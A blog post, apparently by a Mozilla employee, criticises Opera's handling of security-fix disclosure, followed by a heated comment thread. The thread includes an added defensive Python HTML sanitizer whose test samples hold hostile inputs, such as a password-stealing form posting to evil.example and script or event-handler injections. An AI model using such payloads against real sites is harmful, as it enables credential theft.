opera fails to notify users at risk

In my previous post, highlighting the latest Washington Post security article by Brian Krebs, one reader asked "Why no statistics for other browsers? How about... surprise... Opera?"

Today I came across a short article at Heise Security that might go some way toward explaining why Opera flaws aren't discussed in the same way that flaws in the mainstream browsers, Firefox and IE, are.

Opera Software hides security vulnerabilities from their users, and from the public and the press.

Nearly as bad, when they do announce security vulnerabilities, nearly three weeks after shipping the new release, they're dramatically downplaying the severity of the problems and masking the true risk that their users face.

Now, let me make this clear up front. I am not claiming that they should be releasing the explicit details of their fixes or specific information about how to exploit the unfixed versions of the browser. But not telling the user that an update is a critical security update and that the unfixed versions of the browser are vulnerable to remote attack is just wrong.

By adopting this practice, Opera is doing their users a great disservice. If Opera has fixed any serious security flaw, the only responsible way to ensure that users are safe is to clearly and consistently explain to those users that the latest release of the browser has fixed security flaws and users should immediately update or face real dangers on the web. Opera should be using the press it gets around releases to forcefully proclaim that previous versions of their browser are unsafe and should not be used. Failing to use the loudest microphone they have to reach their users in cases involving user safety is simply unacceptable.

Even Microsoft discloses the existence of security flaws in previous releases and the details of their security fixes in the new version at release time.

Hiding the fact that they've fixed security issues for PR reasons takes away the user's only opportunity to protect herself. Betraying users for short term public relations gains is the fastest way to lose the confidence of your users and I wouldn't be surprised to see this cost Opera in a big way.

This is an unacceptable practice for any company that makes internet connected software -- and when it comes to browser makers, it's hard to call it anything other than negligence. Users depend on their software providers to keep them safe and when a software provider explicitly blocks a user's best opportunity at keeping himself safe, it is a fundamental breach of faith users should never tolerate.

At Mozilla, we've invested significant resources building a sophisticated automatic update mechanism that delivers security and stability updates to virtually all our tens of millions of users in less than 48 hours. In addition to the update system, we inform all of our users at the top of the release notes for the new version that it contains security fixes. That explanation links to the full list of issues, categorized and described in terms that both users and technical experts can appreciate. This is all done immediately upon release because we understand that there is no higher value we can offer to our users than to keep them safe on the web, even if that means describing our flaws or shortcomings in detail.

Microsoft also has a sophisticated automatic update system and has adopted similar practices in terms of disclosure. Opera Software should not ship another major release until they have a similar program in place.

reactions, thoughts, comments, etc.

>> Failing to use the loudest microphone they have to reach their users in cases
>> involving user safety is simply unacceptable.

p.e. https://bugzilla.mozilla.org/show_bug.cgi?id=360493
p.e. http://forums.mozillazine.org/viewtopic.php?t=500994

Where is Mozilla's "loudest microphone"?? Bugzilla?? MozillaZine?? Of course every Fx user looks up these sources on a daily basis... Come on, that Opera dissing is ridiculous!

I'm a proud Fx user, but I'm not proud of such behavior!

This release is a recommended security upgrade. See the Security section for additional information.

From the main page of Changelog for Opera 9.02 for Windows. So (sometimes) they let you know that an update is important.

On the other side, Mozilla Firefox 2.0.0.1 Release Notes says that there are some security issues but doesn't warn at first sight if it's a really critical update.

By the way, I don't see the difference between how Opera hides flaws and how Microsoft does it.

This isn't the first time Opera's done something like this. In 2005, there was a critical vulnerability in the Flash player included with Opera http://secunia.com/advisories/17437/. All Opera users had to do to protect themselves from this arbitrary code execution problem was to download the latest version of the Flash player. Opera employees waited for two weeks, during which time proof-of-concept exploit code became available, before finally saying something about the problem when Opera 8.51 was released with the updated Flash player http://my.opera.com/community/forums/topic.dml?id=111234 http://www.opera.com/docs/changelogs/windows/851/. It seems like Opera doesn't really care about users' security, but only wants it to appear as if Opera is secure by not mentioning vulnerabilities.

Funny, when I saw this on Slashdot, I *knew* Asa Dotzler would write about this.

Good one, Asa. First you come up with excuses for the huge number of security holes in Firefox, and you try to minimize the importance of those by pointing to Microsoft and how long it takes for them to patch theirs.

As if Microsoft's crappiness is an excuse for Mozilla's crappiness.

The other day, Opera was irrelevant because it has a better security track record than Mozilla (fewer holes, quicker patches).

Today, Opera is suddenly extremely relevant because Asa can bash it.

Rascal: So what is most important for you? Number of bugs or number of days you are at risk?

If I'm at risk for 9 days instead of 98 days I don't care if those 9 days are because of 1 bug or 1 million.

The key problem here is not the number of bugs, or the time it takes to fix them. That issue was dealt with in the previous post on this blog.

The issue here is that a critical update was not marked as critical. It was disguised as a generic update.

As a user, if you are prompted to download what seems to be a 'feature' update, then you might choose to ignore it.

If the update is marked as a critical security update, then you might choose to download it.

You need to be informed in order to make a decision. Therefore, pulling the wool over your eyes does not allow you to make that informed decision.

They needn't have gone into detail about what the security hole was. There are, I feel, times when it is better not to divulge the nature of a vulnerability.

Even so- it is imperative that people are told if the update is to plug a security hole, or to add yet another feature in an already bloated browser.

Pretty much everything I read about the Opera 9.10 release seemed to focus on the addition of fraud protection as a security feature. I wonder if someone in the PR department thought, "Oh, we're promoting this new security feature, that'll be enough to convince people they need to upgrade!"

A thoroughly unscientific survey of my own site's logs shows a 50/50 split between Opera 9.0x and 9.10... but there are still about 30% of Opera visitors using Opera 7 or 8. If security notices in earlier versions didn't convince them to upgrade, a notice on this one wouldn't have either.

@ Kelson

Agreed, many people will ignore the update even if it had "Critical- Update Now!!!" plastered all over it.

But at least they would be able to make that informed decision.

Consider this:
You're old and computers are some "new device" to you, you know how to use it, but you don't really understand how things work. E.g. your parents.
In most cases children maintain their parents' PC and take care that it doesn't send spam after 2 months.
Opera never asked me to update because a new version was released, although I greatly appreciate Opera for its superb download manager. Now, my parents don't know anything about updating, except those "please wait while updates are installed" messages when they boot up their company PC. They'll never update Opera unless it specifically asks them to (it doesn't even do that). And even then, it just redirects them to the download page and asks them to download and re-install it. Either they now call me, or just don't update.
In Firefox they have to click "Later" now and then - I printed this dialog out and placed it next to the PC. The next time they start Firefox up, it will show some progress bar, but start anyway.
Actually, Opera would be the browser of choice for my parents. They don't use extensions anyway, so why not use the faster (and probably more secure) Opera - because I don't want to have to regularly maintain my parents' PC. That's a huge advantage for Firefox and it's probably the one thing that Opera lacks over Firefox.
I hope that one day Opera implements an update mechanism similar to Firefox. Please don't use this to start another flame war which browser's better.

when will this get fixed: http://secunia.com/advisories/23046/

a, that's only a moderate severity issue that experts agree needs to be addressed by the websites. (See MySpace, for example, where they've already fixed the problem.) Any website that allows user content, like MySpace, should disallow users from adding password fields and scripts. There are plenty of checks that these kinds of sites already do to prevent XSS, including tag and attribute whitelists. Sites that allow users to include dangerous scripts, tags and attributes open their users to XSS attacks and this is no different.

What does this have to do with Opera's failure to inform their users of critical security flaws in their browser?

- A

The key problems are:

1 the number of bugs
2 the time it takes to fix them.

Mozilla fails miserably at #1, and that Microsoft sucks more than Mozilla at #2 does not excuse #1.

And Mozilla never fails to seize an opportunity to come up with excuses for its own security problems while at the same time bashing others. Just look at Asa's post the other day where he tried to make people ignore the fact that Firefox had more security holes than IE. When an official spokesperson does these kinds of things, one can but wonder what goes on behind closed doors...

What do you imagine goes on behind closed doors? Jesse tells Asa that Firefox has never had any security holes? David Baron and Brendan Eich are forced to stop fixing memory safety bugs and spend all their time adding new features instead? We plot to assassinate an independent security researcher who didn't give us 8 months to fix a bug?

You little Rascal!

How do you make someone ignore something?

I don't care what people say, I am sticking with Firefox.

Opera's response : http://my.opera.com/desktopteam/blog/show.dml/673073
Anyway, Firefox devs don't have the right to criticize Opera, as if you look at Secunia there are plenty of advisories that both Fx and MS IE have just ignored (their excuse being they are not important enough/critical enough). Opera has a 100% track record.

Some thoughts on the Opera response

"Making the vulnerability public knowledge before a stable version fixes the issue would leave lots of users vulnerable."

- They didn't have to explain what the vulnerability is. Just telling people the update pertains to a security fix enables the user to decide if the fix is worth installing now.

"Serious reporters do not announce vulnerabilities before vendors have a fix in public builds"

- Alas, in the real world, the kind of people actually exploiting these vulnerabilities tend not to hold back their attacks until fixes are available

"So what you have been seeing with the 9.10 release and the delayed announcement of two vulnerabilities is an unhappy coincidence of the release and the Christmas vacation."

- I'm not sure this bears any influence at all over a decision to not notify users a security hole needs plugging.

"Happy new year to all, and enjoy safe browsing - and remember to upgrade to 9.10 if you haven't done so yet."

- OK, he totally lost me here. Firefox is only at version 2- nowhere near 9.10! ;-)

@lizard i think he was refering to opera, lol.

Lizzie writes:

"I'm not sure this bears any influence at all over a decision to not notify users a security hole needs plugging."

I'm not sure if you are deliberately being misleading here, but the quote you reply to clearly states that it was a mistake and not a deliberate decision to "hide" anything. Why would Opera suddenly start to "hide" stuff now, after more than ten years of not hiding security issues?

Mozilla fails miserably at [the number of bugs]
Any open project will fail here as they can't fix those without someone noticing. Closed projects on the other hand can (intentionally or not): http://my.opera.com/desktopteam/blog/2007/01/08/handling-security#comment2437906

Mowhawkie writes:

"I'm not sure if you are deliberately being misleading here, but the quote you reply to clearly states that it was a mistake and not a deliberate decision to "hide" anything"

I'm not sure if you are deliberately being misleading here, but I checked, re-checked, and checked again Opera's response. I find no mention of a mistake. In fact, here's the paragraph in question:

"It can happen that the severity of an exploit is upgraded by our internal security team at a later stage, since further analysis shows that the original severity was not accurate: our priority is to first fix the issue; further and deeper analysis happens even after that, and sometimes can rectify initial findings"

Which is fine. Absolutely fine. But it's not explaining why they pushed out an update that fixes a security hole, but didn't tell anyone it fixed a security hole.

The fact that they did afterwards (after all the hullaballo it seems), doesn't really answer why they didn't see fit to tell people in the first place.

I'll reiterate- they didn't need to provide details of the exploit. To just tell people that it covers a security issue is notice enough.

Mr Lizard: You got things mixed up. The first report about these issues was made by Opera. Opera did not make them public after the security reporters.

"Me" is correct. The article that started this whole controversy was written in response to Opera's release of two security advisories last Friday (coordinated with iDefense). It's right there in the opening paragraph of the article: "As Opera Software has announced in recent security notices..."

Hmmm.. the Heise article states Opera didn't mention it in their changelog

"The change log for Opera 9.10 does not contain any indication of these vulnerabilities in the section on security"

So I checked the changelog:

http://www.opera.com/docs/changelogs/windows/910/

At the time of writing, this stood out:

>Release Notes

>This release of Opera introduces Fraud Protection.

So I checked further down the page:

>Security

* New Fraud Protection feature (a phishing filter).
* Changed Wand data to a new format. The upgrade to this new format is not reversible.


This is the changelog, and it's still not here? So even now that Opera have stated in a response, which you'd have to find if you wanted to read it, that security holes got plugged, it's still not in the official changelog (which is the document people *will* read when deciding if the update is for them).

Hurray, they finally updated their changelog. On the other hand that doesn't help those that saw the update and (correctly) dismissed it because it only was a feature release...

Beep: And it doesn't help Firefox users that Mozilla hasn't fixed their open security issue. Wee.. Hypocrites

Lizzie is getting it all wrong yet again. Instead of allowing him to quote things that aren't relevant, let's quote this instead:

"So what you have been seeing with the 9.10 release and the delayed announcement of two vulnerabilities is an unhappy coincidence of the release and the Christmas vacation."

But Lizzie writes:

"But it's not explaining why they pushed out an update that fixes a security hole, but didn't tell anyone it fixed a security hole.

The fact that they did afterwards (after all the hullaballo it seems), doesn't really answer why they didn't see fit to tell people in the first place."

That's the point, Mr Lizard. It was a mistake. It should have been there, but it was "an unhappy coincidence of the release and the Christmas vacation".

It's fine that you try to make Opera look bad to make Mozilla look good the way Asa did the other day to come up with an excuse for Firefox security flaws outnumbering IE's. Unlike Asa, you are not a Mozilla spokesperson.

But when you're spreading misinformation even after being told what's going on, there's no excuse anymore.

Unless you work for Mozilla, in which case this kind of behavior would be expected :)

"At Mozilla, we've invested significant resources building a sophisticated automatic update mechanism that delivers security and stability updates to virtually all our tens of millions of users in less than 48 hours."

I'm not sure when this sophisticated system went into effect, but I've been one of the users left out of the automatic security updates in the recent past ('virtually all' is a good qualifier there). Many a time I've had to update manually after hearing of a Fx vulnerability through the grapevine.

If Mozilla's update mechanism is so "sophisticated", how come I had to upgrade to 2.0 manually?

Oh yeah, and it took far more than 48 hours for it to notify me for past releases.

sure no one from opera here is spreading fud about mozilla *rolleyes*

At least the Opera users here are just that - users. Asa is an official spokesperson for Mozilla.

Asa is an official spokesperson for Mozilla.
IIRC he has stated it before that he is not an official spokesperson and that this here is his personal blog.

That's the point, Mr Lizard. It was a mistake. It should have been there, but it was "an unhappy coincidence of the release and the Christmas vacation".
as someone said on the post over there "Which calls into question how serious Opera really is about security."

And it doesn't help Firefox users that Mozilla hasn't fixed [their] open security issue.
No, it doesn't help, but I don't see what your point is, as the latest announced Firefox security release (2.0.0.1) only lists one Less Critical security issue at Secunia (see the comment from Asa above) and the latest announced Opera security release 9.02 has two Highly Critical issues listed. As stated above it won't help those users that Opera now has updated their changelog...

Beep:
You are wrong. The security issues in Opera are deemed moderate by Opera. The thing is Opera fixed their moderate security issues, while Mozilla has not, and at the same time as Asa accuses Opera of downplaying security issues (since Secunia reports them at a higher severity than Opera does), he also downplays an open security issue in Firefox... Difference: Open.. Fixed.. Days are counting folks....

Quote: "At Mozilla, we've"

We, we, we. That's Mozilla he's talking about. He works for Mozilla.

And a minor mistake with non-critical fixes does not call into question how serious Opera really is about security. Especially since iDefense wanted to wait with the announcement over Xmas (according to iDefense).

"Opera Software hides security vulnerabilities from their users, and from the public and the press."

So our knowledge about the security in applications is based on press releases from the makers of those apps? In that case, Microsoft could have a spotless rep.

Opera 9.10 has no unpatched vulnerabilities, from what I see. When Firefox has *no* unpatched vulnerabilities, whatever the severity, then we can have all the FUD we want. I've never admired that very much as a marketing tactic. It's one thing to "hide" security cracks; it's another to publicize them and do nothing about them.

That said, Firefox and Thunderbird are my defaults.

peeB, Opera made a mistake in announcing those vulnerabilities as non-critical. They were most certainly critical and could allow an attacker to fully compromise a user machine. Opera failed to warn their users when they shipped the new version, leading many users no doubt to believe that the new version wasn't a critical upgrade, and when they did announce the vulnerabilities long after the product shipped they mis-labeled them as less severe than they actually were.

As I've already said, the minor vulnerability listed at Secunia is actually a website problem and not exclusively a browser problem. Major websites are fixing their sloppy coding to fix the problem.

Asa, do you think Opera knows better than you the severity of the security issues? Or are you saying browser vendors should blindly obey the verdicts of the security organizations? When Mozilla disagrees with security reporters, is Mozilla wrong then?
Now isn't it true that the only security issue here that has affected users is the one in Firefox where thousands of users got their passwords stolen? Is it maybe a bit convenient to blame web sites when you, the browser vendor, should be able to provide the user with the secure browser experience you claim you do?

Accusing Opera of downplaying security issues and then brushing off an open security issue in Firefox as a web site problem is not very tactical. Are you allowed to disagree with Secunia and Opera is not?
Doesn't http://secunia.com/advisories/23046/ state:

"
A vulnerability has been discovered in Firefox, which can be exploited by malicious people to conduct phishing attacks."


Now this is an open security issue in Firefox; Opera fixed theirs.. Maybe you should stop attacking when confronted with your poorer security record..


And btw haven't Mozilla also made mistakes in the past??
http://weblogs.mozillazine.org/schrep/archives/2006/02/security_and_vulnerability_rat_1.html

doh, you clearly don't understand security issues and severity.

A vulnerability that allows an attacker to inject code into the stack after a buffer overrun allows the attacker to own that machine. A vulnerability like that which can be triggered by content on a website means that anyone who visits an evil site can lose not only all of the contents of their personal machine, but their machine can be infected with spyware and viruses that use that poor user's machine as an attack launch point against other people and machines. This is a critical vulnerability, no matter what a browser vendor claims. Opera was wrong to not tell their users to upgrade to avoid this critical vulnerability. Then they were wrong to claim it wasn't that severe. They've admitted as much.

A bug which allows one member of a site to steal another member's password and so impersonate them is a serious issue but it affects only the information available on that site and not a user's entire machine and all the data on that machine. In the case of this issue, we believe that it is something that should be corrected by websites. Websites can do all kinds of stupid things to leave their users unsafe. A website could publish all of their user passwords on their front page and that's not a browser's fault. When all is said and done, a browser can do some things to try to make it easier for websites to do fewer stupid things, but this is an issue that must be addressed by sites because it is a site code issue. And they are. The major sites who had this unfortunate flaw have fixed their sites.

So, which is severe and which is moderate.

First, you have an attack that gives the bad guys your entire machine and all of the passwords for every site where you and every member of your family are members, all of your personal files and those of every member of your family who shares your machine, including potentially, financial statements with credit card info, medical history, school records, all of your family's private or work emails, etc -- AND that can leave a virus on your machine that sends the bad guys every keystroke you make from that point forward so they can steal any future information you ever put on your computer or input into any website or receive in any email or IM, and can then use your machine to attack other machines through email worms or distributed denial of service attacks on large-scale private or public infrastructure.

Second, you have an attack where bad guys at a few social websites (websites that foolishly allow their users to add evil content to the pages, when good web development practices would require they block that evil content) for a short period of time were able to steal your login to that one social website.

OK. One of those is a critical browser flaw that cannot be fixed by anyone other than the browser maker and one is a moderate flaw that results from bad website coding practices and can easily be fixed at the website.

That's the situation you have here. If the situation was reversed, I'd be defending Opera or Safari or even IE and saying that websites need to not do stupid things that compromise their users and that Mozilla needs to fix any critical browser vulnerabilities.

I'm not attacking anyone here. I'm simply calling out a failure to protect users and if I see Mozilla taking steps to avoid bad press which are causing users to be at serious risk, I'll say so.

- A
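Asa's two replies above (the short one answering the Secunia link and the longer one on severity) argue that a site accepting user content should enforce tag and attribute whitelists and never let users add password fields or scripts. The following is an added example of such a filter, written for this thread; it is not code from Mozilla, Opera, MySpace or the advisory. The allowed tag and attribute lists, the sample fragments and the hosts `evil.example` and `example.org` are constructed assumptions, chosen to show the password-field bait and the script injection the thread describes.

```python
"""
Whitelist-based sanitizer for user-supplied HTML (added example for this
thread, not any site's or vendor's code). Policy: anything not explicitly
allowed is removed, not escaped. Scripts, forms and password fields are
dropped outright; URL attributes must be http(s) or relative.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Tags a profile page may contain (assumed policy). Everything else is dropped.
ALLOWED_TAGS = {"a", "b", "i", "em", "strong", "p", "br", "ul", "ol", "li", "img"}
# Per-tag attribute whitelist: event handlers (on*) and style never pass.
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
URL_ATTRS = {"href", "src"}          # must pass safe_url()
SAFE_SCHEMES = {"http", "https", ""} # "" means a relative URL
# Elements whose entire content is discarded, not just the tag itself.
DROP_CONTENT_TAGS = {"script", "style", "form", "iframe", "object", "embed"}
VOID_TAGS = {"br", "img"}


def safe_url(value):
    """Accept only http(s) and relative URLs. Non-printable characters are
    stripped first, so 'java\\tscript:' is not smuggled past the check."""
    cleaned = "".join(ch for ch in value if ch.isprintable()).strip()
    return urlparse(cleaned).scheme.lower() in SAFE_SCHEMES


class UserHtmlSanitizer(HTMLParser):
    """Rebuilds the fragment from the whitelist; `removed` records what was
    dropped so the site can log abuse attempts."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.removed = []
        self.skip_depth = 0  # > 0 while inside a DROP_CONTENT_TAGS element

    def handle_starttag(self, tag, attrs):
        # The bait the thread discusses: a user-added password field that a
        # browser's password manager would fill in. Never allowed anywhere.
        if tag == "input" and (dict(attrs).get("type") or "").lower() == "password":
            self.removed.append("password field")
            return
        if tag in DROP_CONTENT_TAGS:
            self.skip_depth += 1
            self.removed.append(f"element <{tag}> and its content")
            return
        if self.skip_depth:
            return
        if tag not in ALLOWED_TAGS:
            self.removed.append(f"tag <{tag}>")  # its text content is kept
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                self.removed.append(f"attribute {name} on <{tag}>")
                continue
            if name in URL_ATTRS and not safe_url(value):
                self.removed.append(f"unsafe URL in {name} on <{tag}>")
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT_TAGS:
            if self.skip_depth:
                self.skip_depth -= 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))  # text is re-escaped

    def handle_comment(self, data):
        self.removed.append("comment")  # comments can hide conditional markup


def sanitize(fragment):
    """Return (clean_html, removed_items) for a user-supplied fragment."""
    parser = UserHtmlSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out), parser.removed


SAMPLES = {  # constructed for this example; not real profile content
    "password bait": '<p>hi</p><form action="http://evil.example/steal">'
                     '<input type="password" name="pw"><input type="submit"></form>'
                     '<script>document.forms[0].submit()</script>',
    "javascript url": '<a href="javascript:alert(1)" onclick="x()">click</a>',
    "event handler": '<img src="http://example.org/a.png" alt="pic" onerror="steal()">',
    "plain text": 'Tom &amp; <b onmouseover="x">Jerry</b> &lt;3 <div>ok</div>',
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        clean, removed = sanitize(raw)
        print(f"{label}: {clean}\n    removed: {removed}")
```

The design point is that the filter rebuilds output from the whitelist rather than trying to blacklist known-bad constructs, so a tag or attribute the policy did not name can never reach the page; the `removed` list gives the site something to log when a profile repeatedly tries to plant forms or scripts.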

"As I've already said, the minor vulnerability listed at Secunia is actually a website problem and not exclusively a browser problem. Major websites are fixing their sloppy coding to fix the problem."

I don't quite understand. If it's a website problem, does it affect all other browsers, or only Firefox?

FYI, Only Firefox (Internet Explorer partially affected, OPERA NOT AFFECTED)

@Monster Max:

If Mozilla's update mechanism is so "sophisticated", how come I had to upgrade to 2.0 manually?

Because it's being used for security updates. If you'd stayed with Firefox 1.5, you would have been automatically updated to 1.5.0.9 by now.

Asa, don't blame doh to "clearly don't understand security issues and severity." if you are the one who doesn't.

You say "A vulnerability that allows an attacker to inject code into the stack after a buffer overrun allows the attacker to own that machine.", and that's right. Thing is, both vulnerabilities in Opera are *heap* buffer problems, only to be exploited through misguided virtual function calls, the *stack* stays entirely intact. This means that a technique called "heap spraying" has to be used to fill up your *entire memory* with code snippets and hope that the execution ends up there. That spraying is possible with Javascript, BUT

1. it takes quite a while, so the exploit becomes quite noticeable
2. it only works if you're "lucky", most times it will just crash and nothing more.

I have working exploit code for both vulnerabilities, and in my (admittedly statistically not all too significant, but after all real life) tests they succeeded in between 1 in 1000 and 1 in 10000 cases. WOW. So who's downplaying/uphyping issues here, eh?

"Opera made a mistake in announcing those vulnerabilities as non-critical. They were most certainly critical and could allow an attacker to fully compromise a user machine."

You are an ignorant fool, Ass-a. Mozilla should be ashamed to have an official spokesperson like you. What the hell is wrong with PR at Mozilla? Why do they allow you, a rabid and lying troll, to be their face to the world?

"As I've already said, the minor vulnerability listed at Secunia is actually a website problem and not exclusively a browser problem."

Another lame excuse.

Notice how Ass-a is downplaying security flaws in Firefox while pretending to know more about Opera than Opera Software when determining the severity of an Opera flaw.

Disgraceful. Simply disgraceful.

Ouch... This little bullet sure backfired at Asa :-)

apologies for the mistype. s/stack/heap. This is still a remote exploit that can own a machine. Whether 1 in 10 are actually exploited or 1 in 10,000 are, there can be no doubt that this is a critical flaw.

Exploiter, what you're saying is that if I posted your exploit (and I'm assuming you're also willing to admit the possibility that someone could craft a more effective attack, right?) on this lonely little weblog, which only gets between 7,000 and 10,000 views a day, after the last week or so where about (abnormally) 25% of my visitors are Opera users and about 5% of my visitors were using an un-patched version of Opera (yielding about 3,500 views by unpatched Opera users,) I could today probably own at least one of them.

Now, take a site with real traffic, like a warez site with hundreds of thousands of daily views or even millions and you're talking about large numbers of Opera users being vulnerable and many of them actually being successfully exploited.

Some of this is mitigated by the fact that there aren't that many Opera users, but that's no excuse for Opera not doing everything in their power to keep those users safe.

- A

"that's no excuse for Opera not doing everything in their power to keep those users safe."

Isn't that the reason why Opera has 0 unpatched security advisories?... Wonder whether the FF record is as good...

golliwogg, patching a flaw and actually delivering that patch to all of your users are two different things. I commend Opera on fixing flaws. I think it's great. Nowhere here have I said they did a bad job fixing these flaws. From what I can tell, they did a great job and the turnaround was darned quick.

I'm critical of Opera not because of anything to do with their fix. I'm critical because they failed to let their users know how important it was for all of them to upgrade to the latest fixed version. Unlike Firefox, Opera does not have a way to ensure that all of their users upgrade. They can tell the users with an update notice in the client that a new version is available and they can announce it loudly in the press and on their websites. What Opera failed to do was utilize these two contact points with their users to express how important it was to upgrade. They treated the release as a feature update and many of their users didn't update because they didn't feel that it was that important to get the new features. If Opera had used the client notification and the announcements on their homepage and in the press to say "All Opera users are urged to upgrade to get critical security fixes" rather than essentially "We've got some new features for you" then a lot more Opera users would be protected today. They didn't do that and that's why I'm critical.

And Disgracasa continues his pathetic lies. He now pretends that Opera did this on purpose, the way this Mozilla spokesperson purposely repeatedly lies about Opera in his blog.

And once again he pretends to know better than Opera how severe security issues are, while at the same time making up excuses for wide open security holes in his own product.

"Unlike Firefox, Opera does not have a way to ensure that all of their users upgrade."

Yeah, fair enough: Opera does have an automatic notification system of updates, but no automatic update mechanism.

"If [...] then a lot more Opera users would be protected today."

No - would have been protected *over Christmas*, when the vulnerabilities were undisclosed (and hence maybe known only to Exploiter?). I guess by now even my grandmother knows there was a security upgrade in 9.10 :) - and I guess that is also thanks to the noise you raised. Maybe Opera should look into hiring you for their community-information stunts?

"They didn't do that and that's why I'm critical."

Or maybe rather a bit over-zealous in putting Opera into a bad light? After all, it seems that these things do not only happen to Opera, but have happened to Mozilla as well ( http://weblogs.mozillazine.org/schrep/archives/2006/02/security_and_vulnerability_rat_1.html ) - back in the days when Firefox didn't have an automatic update mechanism (or does my memory fail me here?)...

golliwogg, you're part right. A year ago we made a mistake in classifying one of our fixed flaws, but the release was still a critical release because there was another serious flaw patched and a couple of less serious flaws patched. So mis-classifying one did not change our approach to the release. Had it been the only flaw we were patching or had we made the mistake in classification across all of the flaws we patched and disclosed, then the consequences might have been a little bit worse, but not that much worse, because it was also mitigated by the fact that yes, we did have our automatic update system starting with Firefox 1.5 (so it was in place for 1.5.0.1 forward) and all of our users received that automatic update. Reporting the flaw was not our only opportunity to convince users to update, the update was automatic.

If Opera had an automatic system like Mozilla or Microsoft (or Apple or dozens of other companies and products on the web) then I wouldn't have had much to say about their latest security release.

- A

"If Opera had an automatic system [...] then I wouldn't have had much to say about their latest security release."

It's always difficult to say what would have happened "if"... :) But well, the important bit is to make sure all users *can* update to a safe product after all, isn't it?

May I take the chance to ask why the Firefox vulnerability mentioned a few times already here (and you can't be serious when making *websites* responsible for that password disclosure, can you?) hasn't been taken care of yet?

Asa
Thanks for the evading reply and long lecture about the basics of what can happen when a file is installed on a computer, now I feel like I know soo much more about security *yawn*
It's obvious you have higher criteria for Opera when it comes to security. We all expect more of them, and the reason is they are simply better.
Now instead of lying

"Then they were wrong to claim it wasn't that severe. They've admitted as much."

http://www.internetnews.com/dev-news/article.php/3653226

please consider next time someone makes a mistake to give them the benefit of doubt. I can't see any Opera people attacking Mozilla when they did some misjudgements about security issues in Firefox 1.5.03

I somehow don't see you as the correct moral compass with your skewed points and arguments. You are clearly not able to make anyone understand why you attack them so harshly..

Remember people make mistakes, but the biggest mistake one can do is to not give anyone the benefit of doubt or someone might return the favor


Asa have a safe weekend using Opera away from work. We all know you like the safe feeling it gives you ;-)


A quick note about commenting. I was just looking over the comments here, and there were at least two (maybe three) people posting under different names and email addresses. On a contentious discussion thread like this one, that begins to look an awful lot like sockpuppetry.

Since I didn't catch it early and post this warning, I'm not going to delete comments here, but going forward, please use the same name or email so you fairly represent yourself and so others know they're addressing one person and not several.

If I see continued multiple postings from the same person using different names, I'm going to delete them and ban the commenter. Thanks for helping to keep the discussion sane.

- A

"If Opera had used the client notification and the announcements on their homepage and in the press to say "All Opera users are urged to upgrade to get critical security fixes" rather than essentially "We've got some new features for you" then a lot more Opera users would be protected today."

The fact is, when I use Opera 9.10 *today*, I'm more secure than I am when using Firefox 2.0.0.1, right?

The point being, as I said above, Mozilla should ensure that all their own ducks are in a row when it comes to security flaws before going after Opera. It never ceases to amaze me that a browser with a 1% market share (as Mozilla spokesmen and less temperate fans are always quick to point out) should attract so much of Mozilla's attention, or should haunt their thoughts, apparently. ;)

anon, that's hard to say. Honestly. I suspect they're roughly equivalent. I can't think of any serious vulnerabilities in either browser if the user is fully up to date. The problem is the users who aren't up to date.

You and I are able to keep ourselves safe. It's the "regular users" out there who need the most help from the browser vendors and right now, as far as I can tell, they are being better supported by Firefox than Opera. Firefox has the technology to keep all of its users up to date and Opera doesn't. That's not a slam, it's just the state of things when it comes to browsers. IE has a better system in place than Opera to keep their users up to date. So does Apple with Safari. Because Opera is behind the mainstream browsers in this area, it is really incumbent upon them to do two things. First, they need to use whatever tools they have today to get users to upgrade to their latest secure versions. Not doing everything in their power to get those Opera 7, 8, and 9.0 users to update means they're failing those users when it comes to keeping them safe. Second, Opera needs to spend whatever resources it takes to build an automatic update system for their products. Web browser makers today simply cannot afford to leave so many users at risk. Firefox, IE, and Safari all have such a system and Opera doesn't.

- A

"anon, that's hard to say. Honestly. I suspect they're roughly equivalent. I can't think of any serious vulnerabilities in either browser if the user is fully up to date. The problem is the users who aren't up to date."

I agree with that.

"Second, Opera needs to spend whatever resources it takes to build an automatic update system for their products."

Wholeheartedly agree with that as well. There's no excuse for Opera not having implemented an auto-update, auto-install mechanism. That should've been done long before the widgets and BitTorrent thing.

Ha ha... It's a funny, childish argument. There's no need to argue. And everyone can play over the web with his/her own fav browser. There will be no time when all people in the world use the same browser. So what is the point of this war? To show Firefox is better, or Opera maybe? Are you adults here?

Firefox is a good browser but I keep using Opera because I feel more relaxed with it over the web. While I respect both Firefox people and Mozilla itself. And this is what most Opera fans follow. Sorry to say but it's not true about Firefox people. They're always in war. Anyway it was always like this. Open source communities attacking non open source ones for some odd odd reasons.

cheers.

Just to help:

if you want to check you're using the most current version of Opera:

Help [on the menu bar] > Check for updates

Asa:

Why are you even writing about this though? Surely there's enough about Firefox [which is a great browser, by the way] and Mozilla to write about without having to be negative about something else? You could be commenting on any of the many products that Mozilla makes and providing proper and dare I say, ORIGINAL news. But instead you choose to re-hash. I am startled by the lack of information and thinly disguised bile you distribute sometimes.

And how come every time you "start a debate" it always boils down to "yah boo sucks, we're great and you're not"? You might not be a Mozilla spokesperson, but through the fires you start you do them more harm than good anyway, and so that may be a good thing for them.

Please stop writing.

The security issues in Opera are deemed moderate by Opera.
Yes, deemed moderate by Opera, but critical most others.

The thing is Opera fixed their moderate security issues, while Mozilla has not, and at the same time as Asa accuses Opera of downplaying security issues (as Secunia reports them as higher severity than Opera does) he also downplays an open security issue in Firefox.
If the two Opera issues were only Moderately Critical then the Firefox issue is Not Critical at all going by Secunia...

We, we, we. That's Mozilla he's talking about. He works for Mozilla.
Sure he does, but working for someone doesn't automatically make you a spokesperson... Also I noted that it might be incorrect...

Opera 9.10 has no unpatched vulnerabilities, from what I see.
And no one claimed, from what I see. But you can be assured that many Opera users (even security hardliners) will think the same applies to Opera 9.02 because the changelog they read indicated that there were no security fixes.

